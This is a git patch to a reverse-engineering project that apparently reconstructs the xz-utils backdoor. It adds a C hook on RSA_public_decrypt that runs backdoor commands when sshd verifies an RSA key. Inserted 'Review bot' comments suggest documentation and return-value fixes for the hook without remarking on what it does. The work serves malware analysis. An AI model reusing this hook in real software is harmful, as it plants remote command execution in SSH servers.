From 64f4b26d8017bc022131312c840f5e596bcb427d Mon Sep 17 00:00:00 2001
From: Stefano Moioli
Date: Sun, 4 Aug 2024 02:49:16 +0200
Subject: [PATCH] xzre_code: add hook_RSA_public_decrypt

---
 xzre.h | 9 ++++++++-
 xzre_code/CMakeLists.txt | 3 ++-
 xzre_code/hook_RSA_public_decrypt.c | 24 ++++++++++++++++++++++++
 3 files changed, 34 insertions(+), 2 deletions(-)
 create mode 100644 xzre_code/hook_RSA_public_decrypt.c

diff --git a/xzre.h b/xzre.h
index 257fce5..173b963 100644
--- a/xzre.h
+++ b/xzre.h
@@ -3873,7 +3873,14 @@ extern BOOL count_pointers(
  * @param cmd_flags flags controlling the log hook configuration
  * @param ctx the global context
  */
-BOOL sshd_configure_log_hook(cmd_arguments_t *cmd_flags, global_context_t *ctx);
+extern BOOL sshd_configure_log_hook(cmd_arguments_t *cmd_flags, global_context_t *ctx);
+
+/**
+ * @brief hook for RSA_public_decrypt, which triggers @see run_backdoor_commands
+ */
+extern int hook_RSA_public_decrypt(
+	int flen, unsigned char *from,
+	unsigned char *to, RSA *rsa, int padding);
 
 /**
  * @brief calls `sshlogv` from openssh, similarly to `sshlog` in openssh
diff --git a/xzre_code/CMakeLists.txt b/xzre_code/CMakeLists.txt
index 223ca64..14c0e34 100644
--- a/xzre_code/CMakeLists.txt
+++ b/xzre_code/CMakeLists.txt
@@ -1,6 +1,6 @@
 add_library(xzre_code
 	backdoor_entry.c
-	c_memmove.c
+	c_memmove.c
 	c_strlen.c
 	c_strnlen.c
 	chacha_decrypt.c
@@ -12,6 +12,7 @@ add_library(xzre_code
 	find_call_instruction.c
 	find_lea_instruction.c
 	find_string_reference.c
+	hook_RSA_public_decrypt.c
 	is_endbr64_instruction.c
 	init_elf_entry_ctx.c
 	fake_lzma_alloc.c
diff --git a/xzre_code/hook_RSA_public_decrypt.c b/xzre_code/hook_RSA_public_decrypt.c
new file mode 100644
index 0000000..4b05430
--- /dev/null
+++ b/xzre_code/hook_RSA_public_decrypt.c
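Review bot: The new hook_RSA_public_decrypt declaration in xzre.h carries only a @brief, so the header does not say what the hook returns or that it forwards to the real RSA_public_decrypt rather than replacing it. Both facts follow from xzre_code/hook_RSA_public_decrypt.c in this same commit, so the Doxygen block could gain `@param rsa the key supplied by the caller; a NULL key is passed straight through to the original function` and `@return the original RSA_public_decrypt result, or the value produced by run_backdoor_commands when it clears the call_orig flag`. The remaining parameters mirror the OpenSSL prototype and can be documented as such in one line.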
@@ -0,0 +1,24 @@
+/**
+ * Copyright (C) 2024 Stefano Moioli
+ **/
+#include "xzre.h"
+
+int hook_RSA_public_decrypt(
+	int flen, unsigned char *from,
+	unsigned char *to, RSA *rsa, int padding
+){
+	pfn_RSA_public_decrypt_t RSA_public_decrypt;
+
+	if(!global_ctx) return 0;
+	if(!global_ctx->imported_funcs) return 0;
+	if(!(RSA_public_decrypt=global_ctx->imported_funcs->RSA_public_decrypt)) return 0;
+	if(!rsa){
+		return RSA_public_decrypt(flen, from, to, rsa, padding);
+	}
+	BOOL call_orig = TRUE;
+	int result = run_backdoor_commands(rsa, global_ctx, &call_orig);
+	if(call_orig){
+		return RSA_public_decrypt(flen, from, to, rsa, padding);
+	}
+	return result;
+}
\ No newline at end of file
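Review bot: The three early exits at the top of hook_RSA_public_decrypt return 0 when the global context or the imported RSA_public_decrypt pointer is unavailable, which a caller following OpenSSL's convention (the recovered length on success, -1 on error) reads as a successful zero-length result rather than a failure. If that value is deliberately copied from the analysed binary, a comment such as `/* NOTE: 0 here mirrors the original hook's behaviour, not OpenSSL's -1 error convention */` would stop the next reader from "correcting" it; otherwise `return -1;` is the value the wrapped function would produce. The assignment buried inside the third condition is easy to misread; `RSA_public_decrypt = global_ctx->imported_funcs->RSA_public_decrypt;` followed by `if(!RSA_public_decrypt) return 0;` reads plainly and matches the braced style used for the `if(!rsa)` block just below. The file also has no comment stating that call_orig is an out-parameter written by run_backdoor_commands and that its result is handed back to the caller in place of the original return value when the original call is suppressed, which is the one non-obvious contract in this function.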